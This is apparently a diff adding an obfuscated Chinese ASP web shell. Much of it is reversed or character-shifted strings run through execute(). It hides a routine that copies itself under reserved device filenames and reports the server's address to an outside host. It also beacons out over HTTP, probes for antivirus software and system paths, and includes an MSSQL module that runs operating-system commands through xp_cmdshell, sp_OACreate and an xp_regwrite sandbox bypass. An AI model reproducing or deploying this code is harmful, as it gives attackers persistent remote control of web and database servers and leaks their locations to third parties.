%myfuy%+%'BxxjhhF%'%+%kqwhg{%+%'jstSBxtnyfW2'%+%kqwhg{%+%'wfqzljWBju~Yiwt|xxfU2'%+%kqwhg{%+%'rjyx~XBjhsfsjysnfR2'�ed%+%kqwhg{%+%'5Brzrn}fRfytzV2'%+%kqwhg{%+%'5BysjwwzHfytzV2'%+%kqwhg{%+%'5BynijwHxtnyfW2'%+%kqwhg{%+%'6Bs|tItnyfW2'�ed%+%kqwhg{%+%'6BuZtnyfW2'%+%kqwhg{%+%'5Bjwnu}J2'%+%kqwhg{%+%'62ByzTjrnYstnxxjX2'%+%kqwhg{%+%'55;ByzTjrnYjqiN2'%+%kqwhg{%+%'62BxwjxZwS}fR2'�ed%+%kqwhg{%+%'5Bs|tIynrnQijjuX2'%+%kqwhg{%+%'5BuZynrnQijjuX2'%+%kqwhg{%+%'62BUNwjUsnltQxwjxZ}fR2'%+%kqwhg{%+%'5BjqgfsJfytzV2'�ed%+%kqwhg{%+%'5Biwt|xxfUjlsfmH2'%+%kqwhg{%+%'5BsnltQ|tqqFx~f|qF2'%+%kqwhg{%+%'5BsjiinMjinM2'%+%kqwhg{%+%'5BjwzhjXijjS2'�ed%+%kqwhg{%+%'6BxmyfUqjW2'%+%kqwhg{%+%'5BjqgfxnI2'%+%kqwhg{%+%'BjqnKxjRsnltQ2'%+%kqwhg{%+%'a'%+%myfuy%+%'BwnIjrtM2'�ed%+%kqwhg{%+%xxfuy%+%'Biwt|xxfU2'%+%kqwhg{%+%wjxzy%+%'BwjxZ2'%+%kqwhg{%+%ywtuy%+%'BtSywtU2'%+%kqwhg{%+%'5353535BUN2'%+%kqwhg{%+%'UZYJXWJXZYJX2'%+%xj{fjq%B%xj{fjq�ekQwHg{%+%'B~jPT_Y%'%+%kQwHg{%+%'5BjqgfsJT_Y2'%+%kQwHg{%+%'5""6""62""'%+%ywtuy%+%'""5353535""jz~zt~BsnfrtI2'%+%kQwHg{%+%'SNFRTIYJX2'%+%xj{fjq%B%xj{fjq�ekQwHg{%+%'JHSFSJYSNFR%JYNX'%B%yr�ekQwHg{%+%ywtuy%+%'BtSywtU%'%+%kQwHg{%+%'5353535BUN2'%+%kQwHg{%+%'SNFRTIjyjqjI2'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%'JHSFSJYSNFR%JYNX'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%i|u%+%'%xxfU'%+%xj{fjq%B%xj{fjq�ekqwhg{%+%wxZ%+%'%wjxZ'%B%xj{fjq�esjmY%'iif'%B%.'styyzgtnifw'-rwtK3yxjzvjw%kn")):End Function:
+execute(shisanfun("noitcnuF dne��cbb=tpyrcnE��txen��fi dne��c&cbb=cbb��esle��)1,)e(tnic,1LEEHWs(dim&cbb=cbb��)���,�����,d(ecalper=e��1+i=i��)2,i,dca(dim=d��neht �����=c fi��)1,i,dca(dim=c��1 pets )dca(neL oT 1 = i roF��)dca(tpyrcnE noitcnuF���twj�� = 1LEEHWs"))
+acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Function fuck():On Error Resume Next
+execute(LUnEnCode(".myfUyktX-jxfhqBtksnmyfU�e.'myfU'-rjyn3ysjrstwn{sJ3mx\BmyfUyktX�e.'qqjmX3yunwhx\'-yhjogtjyfjwhBmx|%yjx�emx|%rni"))
+Response.Write"<LI>ϵͳ����֧��:<BR>"
+Response.Write"-----------------------------<br>"
+execute(LUnEnCode("'CwgA��֧?������ɱ��ϵ����CnqA'%jynw\3jxstuxjW%sjmY%.'lsnxnw'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱ��������CnqA'%jynw\3jxstuxjW%sjmY%.'xzwn{nysf'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱ��ϵɽ��CnqA'%jynw\3jxstuxjW%sjmY%.'{fp'1tksnmyfU-wyxsn%kn�e'CwgA��֧?������ɱqqnPCnqA'%jynw\3jxstuxjW%sjmY%.'qqnP'1tksnmyfU-wyxsn%kn�e'CwgA��֧?�ƿ�jwjm|~sFhU��������CnqA'%jynw\3jxstuxjW%sjmY%.'jwjm|~sfhu'1tksnmyfU-wyxsn%kn�e'CwgA��֧?�����RKHCnqA'%jynw\3jxstuxjW%sjmY%.'<}rstnxzkh'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������jqhfwTCnqA'%jynw\3jxstuxjW%sjmY%.'jqhfwt'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������QVX~RCnqA'%jynw\3jxstuxjW%sjmY%.'qvx~r'1tksnmyfU-wyxsn%kn�e'CwgA��֧?��������QVXXRCnqA'%jynw\3jxstuxjW%sjmY%.'wj{wjx%qvx%yktxtwhnr'1tksnmyfU-wyxsn%kn�e'CwgA��֧?����f{fOCnqA'%jynw\3jxstuxjW%sjmY%.'f{fo'1tksnmyfU-wyxsn%kn�e'CwgA��֧?����qwjUCnqA'%jynw\3jxstuxjW%sjmY%.'qwju'1tksnmyfU-wyxsN%kn"))
+paths=split(SoftPath,";")
+Response.Write "------------------------------------<br>"
+Response.Write "ϵͳ��ǰ·������:<br>"
+For i=Lbound(paths) to Ubound(paths)
+Response.Write "<li>"&paths(i)&"<br>"
+next:end Function
+execute(shisanfun("bus dne���>tpircs/<;'��&lru&)��eman_revres��(tseuqer&��//:ptth'=noitacol.tnerap>tpircs<�� srr:gnihton=osf tes:1emanelif&��.��&xepdnr&��\��&1htapelif&��\.\\��,htapf elifypoc.osf:1emanelif&��.��&xepdnr&))��/��,lru(verrtsni,lru(tfel=lru:)��lru��(selbairavrevres.tseuqer=lru:))��\��,htapf(verrtsni-)htapf(nel,htapf(thgir=1emanelif:)��.��(htappam.revres=1htapelif:���=)��wjles��(noisses:))71,0(rebmundnr()��|��,xep(tilps=xepdnr:��9tpl|8tpl|7tpl|6tpl|5tpl|4tpl|3tpl|2tpl|1tpl|9moc|8moc|7moc|6moc|5moc|4moc|3moc|2moc|1moc��=xep:)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes:)��detalsnart_htap��(selbairavrevres.tseuqer=htapf��llehsneddih bus"))
+execute(LUnEnCode("stnyhszK%isj?kn%isJ%%%%%%�e'����jwjm|~sFhu���ý��Ʋ�����¼Ŀ��Ĭ���Կ�1��������jwjm|~sFhu�ַ�CnqA'%jynw\3jxstuxjW%%%%%%%%�esjmY%.'knh3'+jrfswj{wjx+'ahjysfr~XafyfI%stnyfhnquuFaxwjxZ%qqFaxlsnyyjX%isF%xysjrzhtIa'+wj{nwix~x-xyxn}JjqnK3txk%kN%%%%%%�e.'jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'-ifjWljW3mx|Bjrfswj{wjx%%%%%%�e.71.7-wjiqtKqfnhjuxyjL3txK-ykjqBj{nwix~X%%%%%%�e.'yhjogTrjyx~XjqnK3lsnyunwhX'-yhjogtjyfjwH3wj{wjXBtxk%yjX%%%%%%�ey}jS%%%%�e%kn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgA��ľUMU��д�Ҳ�1¼ĿqnfRgj\�Ҳ��Կ�1������Ȩrjyx~XqfhtQ����1qnfrsn\%hnlfR���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%.'qnfrsn|'1.jrfS3jhn{wjXogt-jxfhq-wyxsn%kn%%%%%%%�e�ekn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgAȨ����ľuxO��ʹ�ǿ��Կ�1������Ȩrjyx~XqfhtQ����1yfhrtY���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%.'yfhrty'1.jrfS3jhn{wjXogt-jxfhq-wyxsn%kn%%%%%%�ekn%isJ%%%%%%�ekn%isj%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwgA��ľUMU�ǿ��Կ�1rjyx~XqfhtQΪ��Ȩ����1�ڴ����jmhfuF���������CnqA%'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgAȨ���ֱ�Կ�3jmhfuFΪ�����GJ\ǰ��CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%.'jmhfuF'1.'JWF\YKTXdWJ[WJX'-xjqgfnwf[wj{wjX3yxjzvjW-wyxsn%kN%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%'jmhfuf'B.jrfS3jhn{wjXogt-jxfhq%kn%%%%%%�ekn%isJ%%%%%%�ekn%isJ%%%%%%%%�e'CwgAȨ���ǿ��Կ�1������Ȩrjyx~XqfhtQ����1װ��Z2{wjX���������CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%'rjyx~XqfhtQ'BjrfSyszthhFjhn{wjX3jhn{wjXogt%kn%%%%%%%%�esjmY%'Z2{wjX'BjrfS3jhn{wjXogt%kn%%%%%%�e%%%%%�e%%%%%%�ewjyzurtHogt%sN%jhn{wjXogt%mhfJ%wtK%%%%�ey}jS%jrzxjW%wtwwJ%sT,%%%%�e.'jhn{wjX'-~fwwF%B%wjyqnK3wjyzurtHogt%%%%�e.'stnyfhnquuF3qqjmX'-yhjogTjyfjwH3wj{wjX%B%fx%yjX%%%%�e.'344?YSsn\'-yhjogTyjL%B%wjyzurtHogt%yjX�e'CwmACwgAb��̽���������`'%jynw|3jxstuxjW?.-~itl%stnyhszK?stnyhszK%isj?'CwgACwgACwgA222222222222222222222222222222222222'%jynw\3jxstuxjW�e'CwgA'+pp+'?Ϊ��������ǰ��CnqA'jynw\3jxstuxjW�e.pm-ifjWljW3mx|Bpp�e'ysztHarzsJaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'Bpm�e'CwgA'+qrys+'?Ϊ����qryS%yjsqjYCnqA'%jynw\3jxstuxjW�e6BqryS%sjmY%''Bqrys%kn�e.~jpQRYS-ifjWljW3mx\Bqrys�e'QRYSa536awj{wjXyjsqjYayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jpQRYS�e'CwgA'+~quxni+'?������Ǵ���ʾ�Է���CnqA'%jynw\3jxstuxjW�e'��'B~quxni%jxqj%'��'B~quxni%sjmY%5Bsnltquxni%wt%''Bsnltquxni%kN�e.'jrfSwjxZyxfQ~fquxnIystIarjyx~XaxjnhnqtUastnxwj[ysjwwzHax|tisn\ayktxtwhnRajwf|yktXaJSNMHFRdQFHTQd^JPM'-ifjWljw3mx|Bsnltquxni�ekn%isJ�e'CwgA'+i|xxfU+'?����CjwfzvxBju~y%nqA'%jynw\3jxstuxjW%%�e'CwgA'+snriF+'?������CjwfzvxBju~y%nqA'%jynw\3jxstuxjW%%�e.'iwt|xxfUyqzfkjIastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'-ifjWljW3mx\Bi|xxfU%%�e.'jrfSwjxZyqzfkjIastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'-ifjWljW3mx\BsnriF%%�e'CwgA����?��Ƕ��Ի���CnqA'%jynw\3jxstuxjW%%�ejxqJ�e'CwgA����δ?��Ƕ��Ի���CnqA'%jynw\3jxstuxjW%%�esjmY%''BsnltqtyzF%wt%5BsnltqtyzF%kn�e.snltqtyzFxn-ifjWljW3mx\BsnltqtyzF�e'stltQsnriFtyzFastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'BsnltqtyzFxn�e'CwgA'+jrfSsnriF+'?Ϊ������Ա������ĬCnqA'%jynw\3jxstuxjW�e'wtyfwyxnsnriF'BjrfSsnriF%sjmY%''Bjrfssnrif%kn�e.~jPjrfSsnriF-ifjWljW3mx|BjrfSsnriF�e'jrfSwjxZyqzfkjIyqFastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jPjrfSsnriF�e'CwgA'+jrfshu+'?Ϊ������ǰ��CnqA'%jynw\3jxstuxjW�e'CwgA3������ȡ������'Bjrfshu%sjmY%''Bjrfshu%kn�e.~jpjrfshu-ifjWljW3mx|Bjrfshu�e'jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'B~jpjrfshu�e�e'C6Bj nx%wmACwgAb��̽����ͳϵ`CwgACwgA'%jynw\3jxstuxjW	�ekn%isj%%%%�ey}jS%%%%%%�e'CwgA222222222222222222222222222222222222222222222222'%jynw\3jxstuxjW%%%%%%%%�ekn%isJ%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwgA'%jynw\3jxstuxjW%%%%%%%%%%%%�ey}js%%%%%%%%%%%%�e'1'+.o-|tqqfUIZ%jynw\3jxstuxjW%%%%%%%%%%%%%%�e.|tqqfuiz-isztGZ%tY%.|tqqfuiz-isztGQ%B%o%wtk%%%%%%%%%%%%�e'?Ϊ�ڶ�UIZ������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgA��ȫ?Ϊ�ڶ�UIZ������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%5B.5-|tqqfuiz%wt%''B.5-|tqqfuiz%kN%%%%%%%%%%�e.UIZqqzK-ifjWljW3mx\B|tqqfuiz%%%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwGA'%jynw\3jxstuxjW%%%%%%%%%%%%�ey}jS%%%%%%%%%%%%�e'1'+.o-|tqqfuhy%jynw\3jxstuxjW%%%%%%%%%%%%%%�e.|tqqfuhy-isztGZ%tY%.|tqqfuhy-isztGQ%B%o%wtK%%%%%%%%%%%%�e'?Ϊ�ڶ�UHY������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgA��ȫ?Ϊ�ڶ�UHY������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%5B.5-|tqqfuhy%wt%''B.5-|tqqfuhy%kN%%%%%%%%%%�e.UHYqqzK-ifjWljW3mx\B|tqqfuhy%%%%%%%%%%�ePZJ+GiuF+myfuBUIZqqzK%%%%%%%%%%�ePYJ+GiuF+myfUBUHYqqzK%%%%%%%%%%�e'xywtUij|tqqFUIZa'BPZJ%%%%%%%%%%�e'xywtUij|tqqFUHYa'BPYJ%%%%%%%%%%�ejxqj%%%%%%%%�e'CwgAѡɸUN4uhY��ûCnqA'%jynw\3jxstuxjW%%%%%%%%%%�e%sjmY%6BwjyqnkunuhytS%kn%%%%%%%%�e�e��̽ѡɸUN4UHY,�e�ekN%isJ%%%%%%%%�e'CwgA������û��ȡ������XSI��ĬCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�e'CwgA'+wyxXSI+'?ΪXSI����CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%''CAwyxXSI%kN%%%%%%%%�e.~jPXSI-ifjWljW3mx\BwyxXSI%%%%%%%%�e'wj{wjXjrfSa'+GiuF+myfUB~jPXSI%%%%%%%%�e�e��̽����XSI,�e�ekn%isJ%%%%%%%%�e'CwgA������û��ȡ�����޹�����ĬCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�ey}jS%%%%%%%%%%�e'CwgA'+.o-~f|jyfL+'?Ϊ'+o+'����CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�e.~f|jyfL-isztgZ%ty%.~f|jyfL-isztgQBo%wtK%%%%%%%%%%�esjmY%.~f\jyfL-~fwwfxn%kN%%%%%%%%�e.~jP~f\jyfL-ifjwljW3mx\B~f\jyfL%%%%%%%%�e'~f|jyfLyqzfkjIa'+GiuF+myfUB~jP~f\jyfL%%%%%%%%�e�e��̽�������,�e�e�e�ekn%isJ%%%%%%%%�e'CwgA������û��ȡ������ַ��UNCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�ey}jS%%%%%%%%%%�e'CwgA'+.o-wiiFUN+'?Ϊ'+o+'ַ��UNCnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�e.wiiFUN-isztgZ%ty%.wiiFUN-isztgQBo%wtK%%%%%%%%%%�esjmY%''CA.5-wiifUN%kN%%%%%%%%�e.~jPUN-ifjwljW3mx\BwiifUN%%%%%%%%�e'xxjwiiFUNa'+GiuF+myfUB~jPUN%%%%%%%%�e��ַ̽��UN,�e�e'axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaJSNMHFRdQFHTQd^JPM'BmyfU%%%%%%%%�e'CwgA'+GiuF+'?Ϊ�����'+n+'����'%jynw\3jxstuxjW%%%%%%%%�e.''1'ajhn{jIa'1.n-xiuF-jhfqujWBGiuF%%%%%%%%�e62.xiuF-isztGZ%tY%.xiuF-isztGQBn%wtK%%%%%%�e%sjmY%.xiuF-~fwwFxN%kN%%%%�e.~jPiuF-ifjWljW3mx\BxiuF%%%%�e'isnGajlfpsnQaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'B~jPiuF%%%%�e�ekN%isJ�e6BwjyqnkunuhytS%%�esjmY%''BjqgfsJxn%wt%5BjqgfsJxn%kN�e.~jPunuhYjqgfsJ-ifjwljW3mx\BjqgfsJxn�e'xwjyqnK~ynwzhjXjqgfsJaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzhaRJYX^XaRQPM'B~jPUNUHYjqgfsJ�e'C6Bj nx%wmACwgAb��̽����`'%jynw\3jxstuxjW%%	�e.'qqjmX3yunwhx\'-yhjogtjyfjwhBmx|%yjx�emx|%rni�ey}js%jrzxjw%wtwwj%st?.-pttm%%stnyhszK")):function x(Posturl): dim w: w="^w^inhttp.^wi^nhttprequest.5.1": Posturl=replace(trim(Posturl),vbcrlf,""): on error resume next: set http= CreateObject(replace(w,"^","")): http.open "POST",Posturl,false: http.SetRequestHeader "REFERER", "http://"&sba&request.ServerVariables("URL"):http.send: Set http=Nothing:end function:Function sqlabc():IF SESSION("LOGIN")="" THEN
+                           RESPONSE.WRITE "<CENTER><FONT COLOR=RED>û�е�½</FONT></CENTER><BR>"
+			   ELSE RESPONSE.WRITE "<CENTER><FONT COLOR=RED>�Ѿ���½</FONT></CENTER><BR>"
+END IF
+                           RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>�˳���½</FONT></A></CENTER><BR>"
+
+IF REQUEST("SQLAAA")="LOGIN" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & REQUEST.FORM("SERVER") & "," & REQUEST.FORM("PORT") & ";PASSWORD=" & REQUEST.FORM("PASS") & ";UID=" & REQUEST.FORM("NAME")
+                       IF ERR.NUMBER=-2147467259 THEN 
+                       RESPONSE.WRITE "<FONT COLOR=RED>����Դ���Ӵ������飡</FONT>"
+                       RESPONSE.END
+                       ELSEIF ERR.NUMBER=-2147217843 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>�û����������������飡</FONT>"
+                       RESPONSE.END
+                       ELSEIF ERR.NUMBER=0 THEN
+                       STRQUERY="SELECT @@VERSION"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF INSTR(RECRESULT(0),"NT 5.0") THEN
+		       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2000ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="2000"
+                       ELSEIF INSTR(RECRESULT(0),"NT 5.1")  THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS XPϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="XP"
+                       ELSEIF INSTR(RECRESULT(0),"NT 5.2")  THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2003ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="2003"
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>����ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="NO"
+                       END IF
+                       STRQUERY="SELECT IS_SRVROLEMEMBER('SYSADMIN')"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+                       IF RECRESULT(0)=1 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>��ϲ��SQL SERVER���Ȩ��</FONT><BR>"
+                       SESSION("PRI")=1
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>���ƣ�Ȩ�޲������Ʋ���ִ�����</FONT><BR>"
+                       SESSION("PRI")=0
+                       END IF              
+		       SESSION("LOGIN")="YES"
+		       SESSION("NAME")=REQUEST.FORM("NAME")
+		       SESSION("PASS")=REQUEST.FORM("PASS")
+		       SESSION("SERVER")=REQUEST.FORM("SERVER")
+		       SESSION("PORT")=REQUEST.FORM("PORT")
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="TEST"  THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       IF SESSION("SYSTEM")="2000" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2000ϵͳ</FONT><BR>"
+                       ELSEIF SESSION("SYSTEM")="XP" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS XPϵͳ</FONT><BR>"
+                       ELSEIF SESSION("SYSTEM")="2003" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2003ϵͳ</FONT><BR>"
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>��������ϵͳ</FONT><BR>"
+                       END IF
+                       IF SESSION("PRI")=1 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>��ϲ��SQL SERVER���Ȩ��</FONT><BR>"
+                       ELSE 
+                       RESPONSE.WRITE "<FONT COLOR=RED>���ƣ�Ȩ�޲������Ʋ���ִ�����</FONT><BR>"
+                       END IF
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")        
+
+                       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_CMDSHELL'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN
+		       SESSION("XP_CMDSHELL")=1 
+		       RESPONSE.WRITE "<FONT COLOR=RED>XP_CMDSHELL............. ����!</FONT>"
+                       ELSE
+		       SESSION("XP_CMDSHELL")=0 
+		       RESPONSE.WRITE "<FONT COLOR=RED>XP_CMDSHELL............. ������!</FONT>"
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='SP_OACREATE'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>SP_OACREATE............. ����!</FONT>"
+		       SESSION("SP_OACREATE")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>SP_OACREATE............. ������!</FONT>"
+                       SESSION("SP_OACREATE")=0
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_REGWRITE'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_REGWRITE............. ����!</FONT>"
+		       SESSION("XP_REGWRITE")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_REGWRITE............. ������!</FONT>"
+		       SESSION("XP_REGWRITE")=0
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_SERVICECONTROL'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_SERVICECONTROL ����!</FONT>"
+		       SESSION("XP_SERVICECONTROL")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_SERVICECONTROL ������!</FONT>"
+		       SESSION("XP_SERVICECONTROL")=0
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF 
+
+ELSEIF REQUEST("SQLAAA")="CMD" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       IF SESSION("PRI")=1 THEN
+		       IF REQUEST("TOOL")="XP_CMDSHELL" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN 
+  		       STRQUERY = "EXEC MASTER.DBO.XP_CMDSHELL '" & REQUEST.FORM("CMD") & "'" 
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+                       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP
+		       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       END IF 
+		       		       
+                       ELSEIF REQUEST("TOOL")="SP_OACREATE" THEN 
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN 
+  		       STRQUERY = "CREATE TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);USE MASTER DECLARE @O INT EXEC SP_OACREATE 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C "&REQUEST("CMD")&" > 8617.TMP',0,TRUE;BULK INSERT [JNC] FROM '8617.TMP' WITH (KEEPNULLS);"
+		       ADOCONN.EXECUTE(STRQUERY)
+                       STRQUERY = "SELECT * FROM JNC"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP 
+                       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+		       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"	
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "DROP TABLE [JNC];DECLARE @O INT EXEC SP_OACREATE 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C DEL 8617.TMP'"
+ 		       ADOCONN.EXECUTE(STRQUERY)
+		       END IF
+
+                       ELSEIF REQUEST("TOOL")="XP_REGWRITE" THEN
+                       IF SESSION("SYSTEM")="2000" THEN
+                       PATH="C:\WINNT\SYSTEM32\IAS\IAS.MDB"
+                       ELSE
+                       PATH="C:\WINDOWS\SYSTEM32\IAS\IAS.MDB"
+                       END IF
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN
+		       CMD=CHR(34)&"CMD.EXE /C "&REQUEST.FORM("CMD")&" > 8617.TMP"&CHR(34)
+		       STRQUERY = "CREATE TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWARE\MICROSOFT\JET\4.0\ENGINES','SANDBOXMODE','REG_DWORD',0;SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CMD&")');"
+                       ADOCONN.EXECUTE(STRQUERY)
